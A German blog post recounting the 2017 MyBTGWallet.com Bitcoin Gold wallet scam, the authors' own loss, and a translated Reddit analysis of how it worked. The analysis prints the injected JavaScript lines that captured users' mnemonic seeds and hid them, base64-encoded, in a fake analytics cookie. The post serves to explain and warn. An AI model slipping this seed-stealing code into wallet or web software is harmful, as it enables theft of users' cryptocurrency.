Wie wir unlängst selber erleben mussten, wurde die Seite MyBTGWallet.com gehacked oder bereits als Scam entwickelt. JohnDass seineszeichens der Entwickler dieses online Bitcoin Gold Wallet ist jedenfalls nicht mehr zu erreichen. Ein kurzer Bericht unserer Erfahrungen über den Millionenhack beim Bitcoin Gold.
Zwischen dem 12. und 14. November 2017 prangte auf der offiziellen Homepage von Bitcoin Gold das Logo von MyBTGWallet.com.
Der Anbieter versprach durch Eingabe des Private Keys sofortigen Zugriff auf Bitcoin Gold sowie die Erstellung einer Bitcoin Gold Adresse. 
Es ist klar, dass immer davon abzuraten ist seinen Private Key auf irgendeiner Website einzugeben. Mittlerweile gelöschte Tweets zeigten aber auch, dass die Entwickler hinter Bitcoin Gold offiziell mit dem Entwickler von MyBTGWallet.com in Kontakt standen. Aus diesem Grund haben auch wir uns für MyBTGWallet.com entschieden.
Wallet eröffnen
Da wir jeweils verschiedene Coins zu Testzwecken minen, wollten wir uns natürlich die Chance mit BTG nicht entgehen lassen. Seit längerer Zeit gab es keine Möglichkeit mehr auf der Bitcoin Blockchain mit GPU’s minen zu können. Also haben wir eine neue Bitcoin Adresse eröffnet und den Private Key davon bei MyBTGWallet.com eingegeben. Sofort erhielten wir nun unsere BTG-Adresse. Anmerkung: Wir haben uns mit dem Source-Code welcher auf github zur Verfügung stand nicht auseinander gesetzt. Ob wir den Scam entdeckt hätten sei aber so oder so dahingestellt. Dazu später mehr. Danach haben wir die üblichen Testereien durchgeführt und verschiedene Mining Pools ausprobiert.
Chaos pur
Dabei ist uns auch aufgefallen, dass auf der Website von MyBTGWallet noch immer die Notiz stand, dass die Seite noch nicht „live“ sei, da Bitcoin Gold angeblich noch gar nicht „live“ geschaltet wurde. Zu diesem Zeitpunkt waren wir aber bereits aktiv am minen und der Umstieg vom Testnetz zur offiziellen Blockchain hatte bereits stattgefunden. Dies war eigentlich bereits ein Anhaltspunkt um Verdacht zu schöpfen. Doch die Organisation und vor allem Kommunikation rund um Bitcoin Gold war schon immer katastrophal. Dies zeigte auch, dass es zwei offizielle Seiten gab, welche nicht dieselben Inhalte zeigten (btcgpu.org und bitcoingold.org). Beide Seiten werden offiziell von den Entwicklern von Bitcoin Gold betrieben, zeigten aber über längere Zeit nicht dieselben Inhalte.
Trotzdem, bereits nach kurzer Zeit erfolgten also auch schon die ersten Auszahlungen. Doch wenige Stunden später wurden dann die ersten Bitcoin Gold von unserer Adresse abgezogen. Die Internetadresse MyBTGWallet.com war zu diesem Zeitpunkt zwar noch erreichbar, doch zugreifen auf sein Wallet konnte man nicht mehr. Stattdessen stand da eine Nachricht, dass die Seite „leider“ gehacked wurde.
Was ist passiert?
Um diese Frage zu beantworten brauchen wir nicht mehr zu tun, als ein Post eines reddit User zu übersetzen:
Mein erster Anhaltspunkt war die Snapshot-Version von bitcoinjs.min.js. Obwohl es sich um eine .min.js handelt, wurde der Code verfeinert. Also verglich ich es mit einer legitimen Version des bitcoinjs-Codes und fand eine interessante Änderung in hdnode.js, Zeile 34,35:
if (seed.length < 16) throw new TypeError('Seed should be at least 128 bits')
if (seed.length > 64) throw new TypeError('Seed should be at most 512 bits')Verglichen mit der Version von mybtgwallet.com
if (seed.length < 16) throw new TypeError('Seed should be at least 128 bits')
if (window.gtagm) {document.cookie='_gtag='+btoa(window.gtagm);delete window.gtagm;}
if (seed.length > 64) throw new TypeError('Seed should be at most 512 bits')Dieser Mistkerl hat diese unscheinbare Codezeile direkt in der Bitcoin Javascript-Bibliothek versteckt. Aber was macht es?
Nun, ich habe die anderen Javascript-Dateien der Website auf gtag überprüft, und habe folgendes gefunden:
Die Version von bip39.min.js von MyBTGWallet wurde ebenfalls verfeinert. Ich muss es aber nicht mit der eigentlichen Quelle vergleichen, denn die Suche nach gtag brachte diesen Abschnitt hervor:
function mnemonicTowords(mnemonic){
if(!window.gtagm) window.gtagm = mnemonic;
}Zwei Vermutungen, was die mnemotechnische Variable ist. Diese Funktion wird nur wenige Zeilen in der gleichen Datei aufgerufen:
function mnemonicToSeed (mnemonic, password) {
var mnemonicwords = mnemonicTowords(mnemonic);Also, wann immer mnemomnicToSeed() aufgerufen wird, wird die Benutzereingabe-Mnemonik in window.gtagm gespeichert, die später in Base64 verschleiert wird (was die Funktion btoa() tut), und dann an einen _gtag-Parameter im Cookie angehängt. Jeder der schon einmal Google Analytics benutzt hat, wird vielleicht sehen, wohin das führt.
Reddit post von u/Uejji / Link: reddit.com/r/btc
Kurz gesagt hat dieser Hacker Google Analytics ausgenutzt und mittels eines Cookies, welches normalerweise das Surfverhalten der Nutzer überträgt, den privaten Schlüssel gespeichert. So konnte er anschliessend diese Informationen herunteladen und entschlüsseln. Raffiniert.
Wer ist Schuld?
Entweder wurde JohnDass durch einen Hack selbst auch Opfer der Betrüger oder er ist der eigentliche Betrüger. Dies können wir nicht herausfinden. Gemäss einem Post von Bitcoinist.com welche mit den Bitcoin Gold Entwicklern in Kontakt stehen, könnten Sie aber JohnDass mittlerweile nicht mehr erreichen. 
Ein Sicherheitshinweis seitens der Bitcoin Gold Entwickler prangt seither auf der Homepage. Ebenfalls wurde auch folgender Beitrag veröffentlicht: https://bitcoingold.org/safety-is-critical/. Dennoch sind wir der Meinung, dass die Verantwortung bei den Betreibern der offiziellen Webseite liegen. Durch die raffinierte Art wie dieser Hack aber vonstatten ging, muss man einfach sagen, dass es nur schwer zu verhindern gewesen wäre. Wichtig bleibt also die Verantwortung jedes einzelnen Nutzers. Wir halten fest: Niemals den Privat Key in eine Onlinewallet eingeben und falls doch, beispielsweise aufgrund eines Fork, unbedingt zuerst die vor dem Fork vorhandenen Bitcoins in ein neues Wallet übertragen. So können im Fall der Fälle nur die geforkten Coins verloren gehen.
